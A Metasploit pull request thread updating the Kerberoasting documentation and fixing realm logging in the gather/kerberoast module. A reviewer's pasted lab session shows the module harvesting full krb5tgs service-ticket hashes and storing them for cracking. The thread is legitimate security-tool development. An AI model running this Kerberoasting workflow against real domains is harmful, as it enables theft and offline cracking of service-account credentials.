Kerberoasting Improvements - Doc Update + Realm Fix - #21447
Conversation
|
Thanks for your pull request! As part of our landing process, we manually verify that all modules work as expected. We've added the |
| Metasploit ships a native Kerberoasting module, `auxiliary/gather/kerberoast`, which does everything end-to-end without | ||
| requiring Python, Impacket, Kiwi, or any other external tooling: it queries LDAP for kerberoastable accounts, requests | ||
| TGS tickets from the KDC, and stores the resulting hashes in the Metasploit credentials database. Once the hashes are in | ||
| the database, the `auxiliary/analyze/crack_windows` module can crack them in `hashcat` mode and write the recovered |
smcintyre-r7
left a comment
There was a problem hiding this comment.
Docs all look good. I did run into some issues while testing the module though. The root problem is that LDAPDomain isn't consistently the correct value in this context. I PR'ed jheysel-r7#9 to pull it from the LDAP server so it should always be correct regardless of the authentication settings.
smcintyre-r7
left a comment
There was a problem hiding this comment.
msf auxiliary(scanner/ldap/ldap_login) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 ldap LDAP smcintyre @ 192.168.159.10:389 192.168.159.128:33235 -> 192.168.159.10:389 (192.168.159.10)
msf auxiliary(scanner/ldap/ldap_login) > creds
Credentials
===========
id host origin service public private realm private_type JtR Format cracked_password
-- ---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
msf auxiliary(scanner/ldap/ldap_login) > previous
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf auxiliary(gather/kerberoast) > run SESSION=-1
[*] Running module against 192.168.159.10
[*] Using cached credential for krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL smcintyre@MSFLAB.LOCAL
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20260519154006_default_192.168.159.10_mit.kerberos.cca_554583.bin
[+] Query returned 1 result.
[+] Success:
$krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$b4f13d277b1ae767b8109474ab1909a0$f63b002edfa6ddccec6058511e8775f72b389c8badb40421596e8e8bb65271f3bba0891069fa98de5de60863a5ac3b49cbf4f68a48b7c046b17f9adf9d67f10d651ca0e4336f14e870379949a166523bf8a92f2980ec73814363f220322943b2f2010825b6a255aaea3e2da0e71b10d5debeb586a5d1d919ba0db99eeaad9a5500968374fb3eaf7a79e2dc0d9d0965be822d91fc846a26ef55406f8305e6b220f6b74c9923a310a91fb3867b8b1d97a24458f2f372f09e04a6f45df779f96df6a16b8e01f81724646cd6c3f680cc7cd2dc0aec64b5b7f84faa3b0014d13f0f4c8cd2319c662766a3666d3fcc98593d9677fb9aa45bf90abbef1cca81b63565a8bac32529836bb51bb2abd28b5b7576a5315a5afa59429e946e5f5525828a8bc1a3f6696fd121bf00167baa8a4920aa92893fe608fadcc64c92980e3718dede8fc1298ba35e6909fa6600c916dcd3b9135ffd31688fdfd4284b41e6b30f25df4efa9ec610484e7b28b86d1c3da3e6f7c9db773c7687f045dbf6e14e6f97c01f3d99b1f7ffa718492a62f1adaa13e0369ca9639d9230d15d4ec07f394472a367ecea255507f49b2891692d69300d2826f35e967b62c7cf987272d104d724eb05cac81aa62082c479408524840ac573392068bdeebb34ea96710015984cdcbe88bb88bef3675c335806ca4814cc1613aa2f33caacc6b3e14396fcf62c5896ddffdacde82424225a2d5db075e19c726432a88358c4185d46d519e31072d0394d747476a2557865f506d6b69cdfb3fba62c13bc71b4f745cf0389d5e094f80187c17752f482029d2e2a2eabf2d2ababeab971474df3355b1fd410c1b89287a74184024409f6ea493a1483ecf51022d808246cbd8c024f8c19f1c0d4037036a91778215a067d719ecefd511d0f67f555907a423a5066da2ca391a1cfb73eaa35d31d24a516540f6bae19a203eb442e2d70d671d1b0a5994e6ece275612bb35a3808d302044c51a1a90812f41f8a7e45d95de88d9317c8bb69846c800247c0bc57a2e04cbe63c467f760dd982e44fb361478f6a7267a4daa9bcbe107714e9231b1ecf90ea5bf1ddf20e3ef55b15b94b73ab9398c05d27a5c9243902861239309ee4a0398bdbeb018964cd6972ab638f01e507e5e44ef0ca88f52795c900d7649ab101582f675b09b6321d46bc749e789cbba09c72024e4f30c8366cad5604adfe24e7844d48d9dc1e773cbefede2f7c73a2413c1b13b6c9b39702a1da081526a03f4718bee487e929f24d684595f0b4a5bc64c262e4151654628ad04f8f06561e5160caa1651ed4afda2bf29301613dd127ebc3ff644c0249b162438a0a25fbb33f333d08b13e6675008fb7ebcb525515a2117c7a120ae2769299bcc4588f3f26cfbfdbe8dbe51aef4b75e581b04a58daaa86e79058ff9b6a5d1dc266017db7b0d0a4e7f1cb2578b8f6d26bb72d4175cbcc9654745927dbfc57ec915d8529e1a900ae355f614358029923e281a034aade970b9769ee07022098d9dc63a8c6c7328cee2fdc3be7d46f1207c1a0927cb7637ab806cb6d032e5652be5d3c43be35ae7d
[*] Auxiliary module execution completed
msf auxiliary(gather/kerberoast) > creds
Credentials
===========
id host origin service public private realm private_type JtR Format cracked_password
-- ---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
344 192.168.159.10 192.168.159.10 88/tcp (kerberos) $krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$b4f13d2 (TRUNCATED) msflab.local Nonreplayable hash krb5tgs-rc4
msf auxiliary(gather/kerberoast) > creds -d
Credentials
===========
id host origin service public private realm private_type JtR Format cracked_password
-- ---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
344 192.168.159.10 192.168.159.10 88/tcp (kerberos) $krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$b4f13d2 (TRUNCATED) msflab.local Nonreplayable hash krb5tgs-rc4
[*] Deleted 1 creds
msf auxiliary(gather/kerberoast) > run SESSION=
[*] Running module against 192.168.159.10
[*] Using cached credential for krbtgt/MSFLAB.LOCAL@MSFLAB.LOCAL smcintyre@MSFLAB.LOCAL
[+] 192.168.159.10:88 - Received a valid TGS-Response
[*] 192.168.159.10:389 - TGS MIT Credential Cache ticket saved to /home/smcintyre/.msf4/loot/20260519154014_default_192.168.159.10_mit.kerberos.cca_366132.bin
[+] Query returned 1 result.
[+] Success:
$krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$a7090245be281be5cad779eac2e00cc1$9ff0635a2b719238951e386609b1f33e50260302769fce38f1882bc220bf6ddb6b69a9b71ca9d6002c29200a3c1a40ff08aa4aab69287e046a5ca36e068feb799fe20a37f32c8479eadeb72de2b9bd38fbfedb81bafdb6df8176ea2d05f3cb2352a14cd8f929ee693d8de22d3a7f680e0340176dafe2161a7662aa1de5a22a3b32d276ce07b9227e6012b75c6259bad29fff1bfaaf257b4026b09bad8e5fc6ef094922c77232dba6566498c7693803e8640121fc59ee4cb068b96ac76df8668c2913f548c2c2362bb8b5e2ca4aae4e05266d9c747a686d67f4bd781ed694edd2ea45b3542f4eddc2093335a8046279744d248ced25cffc74346e0a4bd25d61c622fa99a55c24fb9466d8aa95406f8aa8a2446610360174f7875119c1fb32e98d41c2b15c873d2bb50bc2edfe1735f5977712a036c2f9ddbb85f16bb4db12e10dd1b8694f8faf9271cd9864a1079fadc81041b7d20b149f282042bfe11d44862dc97812f60e11cc577eb94936bb365dcec8e8c38f792b343758bb48984d6f2e3cb5d98a9a4a6c90f0831dad41e14940b198325d4eb7d555263be0d474d9e1b3decf81307843e53a3599de7d93bae7c0b10cb13ac929b1b5e25f9ee3acc8eaa471ce373fd79b30565a0d3cc1bce0372665d74c3c5ac39a24d8e6edf4bab677788d49b278bb3f633a4c9da7f97ef47c522c07ef2cd1df5536f10861d1a8c68be6682ef5cda250ed98afd9d80aa14249e9c677d07271f055a4a8527d6458b73ddac3154ca2d181833d67c1de8b44af7f8ac5621c8f182d26b94c70a8a90a315fd53b919363fd553a81758d323f716228d869729229d1d85c724365b5e49e39eb855ac625df3b2f3f5c5e422d11a1d53dcfe40978c293c1d94863e8e94d05e04896e408903bb5cf1d4f3d33d569fb7930d8b14bf56ba14d0223a41facf0f5b6ca9a3092bf9334a6540ae17c747085ac26172c2483808f5c39ba55ea03f0d62d94d28a323b134c9d67a94a4f14616a1c4bcd36075ae2ea54489877a832953b941f9761bc8593b1a3996ead4788292cddbd5f333f65d203e542dfa10fea0e1846f8e02283c1c8922a0c4cf0b200746372de8eb62a10686c0268d1125dc59e26129daa79977274ed072dcdb14cacf34eb6e29410b5b0369d6ccc6ba75a01f10b81d63dff2708df006a9de471c50a580a90d180c81982107d0578b342655dcd247c059c60fef7a87926703816eaf2d591f3b29e530bebccf98cbbf894d8ec93aac6fd0be32bc2fbeaa892286ce975e3e9028e7816eb601899cc655ac581b5e9baa850ae94707381283a04dbfc60a2c61633db3185eb416ca9d11732024d6043c7e030bd205ecd5e75ab1bb942c2a73049fb994ce976e4774d3c1fd8858261d0bf5bf242b0efc2e4355db019c863c148bb871af525bae6c66021e799a7b0ca728bd8aedd6b3336bb6075e740b6a21c7527da3ebf3633299d16cba14611443b871354636e44c245afd4e0d77dadaa7370d70a1ae06dc50b44daa4e00f6f8a22202da3c8eb12b520b8e6db63248ab890e0acda584c0df4aba2add32c5458cf6572e6167f
[*] Auxiliary module execution completed
msf auxiliary(gather/kerberoast) > creds
Credentials
===========
id host origin service public private realm private_type JtR Format cracked_password
-- ---- ------ ------- ------ ------- ----- ------------ ---------- ----------------
345 192.168.159.10 192.168.159.10 88/tcp (kerberos) $krb5tgs$23$*svc_test$MSFLAB.LOCAL$MSSQLSvc/sql01.msflab.local:1433*$a709024 (TRUNCATED) msflab.local Nonreplayable hash krb5tgs-rc4
msf auxiliary(gather/kerberoast) >
Release NotesThis updates Metasploit's documentation to describe how a kerberoast attack can be performed entirely with Metasploit. It also updates the kerberoast module to correctly log the realm to the database regardless of if an existing LDAP session was used or not. |
This PR addresses sub-issues number 1 and 3 which were raised in issue: Kerberoast Improvements #20871
Fixes the kerberoast module which was not properly storing the realm value in the database for hashes found when running the module. Now the realm value is successfully stored along side the rest of the hash's attributes.
Not fixed in this PR - for context this sub-issue was handled by h00die in PR Add Kerberos type hashes to cracking #20881
Updates the kerberoasting.md documentation. These docs were written before the kerberoast module existed and instructed users to use a combination of impacket dependent modules, the kiwi extension and the hashcat binary outside of msfconsole. This workflow can be executed from entirely within metasploit and the docs now reflect that capability.
Verification
List the steps needed to make sure this thing works
msfconsoleuse gather/kerberoastcredscommandTesting